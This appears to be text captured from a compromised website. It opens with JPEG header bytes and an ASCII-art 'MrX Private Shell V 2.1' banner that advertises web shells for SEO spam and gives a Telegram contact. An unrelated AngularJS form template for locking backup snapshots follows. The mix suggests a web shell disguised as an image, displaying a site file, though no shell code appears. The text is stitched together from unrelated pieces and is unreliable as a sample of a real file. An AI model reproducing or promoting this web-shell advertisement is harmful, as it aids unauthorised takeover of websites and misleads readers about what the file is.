����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<div class="row">
<div class="col-md-8">
<h2>{{lang.t("Snapshots To Lock")}}</h2>
<div class="row">
<div class="col-md-4" ng-repeat="(id, created) in list_checked_parents">
<div style="padding: 10px; margin-bottom: 15px; border: 1px solid #ddd;">
<h5 style="margin-bottom: 0; font-size: 14px; font-weight: bold;">{{lang.d(created)}}</h5>
<div><a href="" ng-click="removeSnapshot(id)" style="color: #cc0000"><span class="fas fa-times"></span> {{lang.t("Remove snapshot")}}</a></div>
</div>
</div>
</div>
</div>
<div class="col-md-4">
<h2>{{lang.t("Lock Options")}}</h2>
<form data-parsley-validate="" class="form-label-left" novalidate>
<div class="form-group">
<label class="control-label col-xs-12" for="lock_ttl">{{ lang.t("Lock Time") }}</label>
<div class="col-xs-12">
<input-dropdown addon="{{lang.t('Days')}}" options="{0:lang.t('Unlimited time'),5:5,10:10,15:15,30:30}" ng-model="lock_options.ttl">
<input validate-field="int" min="1" id="lock_ttl" class="form-control col-md-7 col-xs-12" type="text" ng-model="lock_options.ttl" value="" />
</input-dropdown>
<p class="help-block">{{ lang.t("The lock TTL.") }}</p>
</div>
</div>
</form>
</div>
</div>